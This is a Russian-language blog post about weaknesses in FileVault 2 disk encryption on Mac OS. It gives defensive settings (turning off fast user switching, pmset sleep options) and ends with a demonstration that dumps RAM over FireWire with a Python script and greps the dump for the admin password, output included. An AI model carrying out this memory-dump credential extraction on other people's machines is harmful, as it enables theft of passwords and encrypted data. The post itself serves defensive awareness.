Взлом FileVault 2 — часть 1 — короткая

Безопасность | Автор: Владислав Сикорский Оставить коментарий

Существует некоторый вопрос о степени в которой FileVault 2 уязвим для атак. Мы провели некоторые исследования, и можем поделится результатами. Как оказалось в результате наших исследований операционная система Mac OS «из коробки», даже при включенном  FileVault 2 не спасет ваши данные от взлома. Но с помощью некоторых мер, мы можем закрыть эту уязвимость.

Мы уже писали как настроить FileVault и писали что эта функция шифрованния диска на 99.9% убережет ваши данные. Но как говориться Apple доверяй, но сам проверяй. Вот в таких мыслях и экспериментах родилась эта заметка.  Статья «Взлом FileVault 2″ условно поделена на 2 части. В первой части мы вкратце рассказали какие состояния компьютера наиболее уязвимы для взлома, как настроить безопасность Mac чтобы свети до минимума попытки злоумышленников и в кратце пробежались по методу собственно взлома. Во второй части статьи «Взлом FileVault 2″, для опытных пользователей и любопытных Mac юзеров мы написали подробный отчет, что скорее всего будет интересно многим.

Как защититься от взлома FileVault 2?

Получить пароль администратора из оперативной памяти в операционной системе Mac OS можно в большинстве случаев когда система использует настройки по умолчанию. Но, мы хочтим отметить, что это определенно не фатальный недостаток в FileVault 2, и довольно просто предостеречь эти нападения. К сожалению, операционная система Mac OS не защищена по умолчанию.

Вот краткое изложение того, какие режимы загрузки восприимчивы к атаке:

Схема взлома FileVault 2

(Схема кликабельна)

Защититься от атак довольно просто (при условии, что FileVault включен), вам надо поменять всего три настройки (быстрое переключение пользователей, и пару настроек в режиме сна). Этого будет достаточно чтобы защищать систему, если компьютер находится в режиме сна и если вы еще не вошли в систему.

Как показано на схеме выше, получить доступ к вашим данным можно с помощью быстрого переключения пользователей, поэтому для начала выключим эту функцию. Для этого:

1) Зайдите в Системные настройки->Пользователи и группы.

2) Если замок закрыт, и вы не можете вносит изменения, нажмите на него и введи пароль администратора.

3) Нажмите на кнопку «Параметры входа»

Системные настройки, параметры входа

4) Снимите галочку «Показать меню быстрого переключение пользователей как:»

Эта галочка, в большинстве случаев может стоять если у вас несколько пользователей

Отключение быстрого переключение пользователей

Изменяем настройки режима сна. Эти параметры должны быть изменены из командной строки, в качестве корневого пользователя, используя «pmset» команды. Если вы неуверенный пользователь командной строки, лучше обратитесь в сервисный центр Apple.

Есть два релевантных способа:

Команда Значение Описание
destroyfvkeyonstandby       1 Удаляет полный ключ шифрования тома из памяти, когда система переходит в режим ожидания. Зависит от величины hibernatemode.
hibernatemode       25 Заставляет систему сразу записать содержимое оперативной памяти на диск и отключите питание

К примеру: sudo pmset -a destroyfvkeyonstandby 1 hibernatemode 25

Как взломать FileVault 2?

Мы использовали Freddie Witherden’s libforensic1394 библиотеки чтобы подключиться через FireWire и снять дамп оперативной памяти в бинарный файл. Мы нашли сценарий, который использовал библиотеки для выполнения дампа, скрипт написанн на Python. Скрипт также может (проверено и подтверждено) снимать дампы с Windows 7, и даже с Linux 2.6 при наличии в компьютере Firewire. Сценарий доступен тут.

Теперь все что нам осталось — снять дамп оперативной памяти и узнать пароль:
MacBook-Pro:~ andrey$ sudo -s
Password:
bash-3.2# /Users/andrey/Desktop/Skript.py 1024 f
SBP-2 not used, forcing 2048 byte pages.
[]
Attempting to access device 0: Apple Computer, Inc. Macintosh
Wrote file ramdump.bin.
bash-3.2# strings ramdump.bin |grep --after-context=3 managedUser \
> |grep --after-context=1 password
password
linx-servise
shell
--
password
shell
bash-3.2#

Пароль будет обозначен красным цветом

 

В заключение можем порекомендовать прочитать статьи по безопасности: 

 

Оставить коментарий

LiNX.net.ua by LiNX team
RSS канал RSS отзывы Войти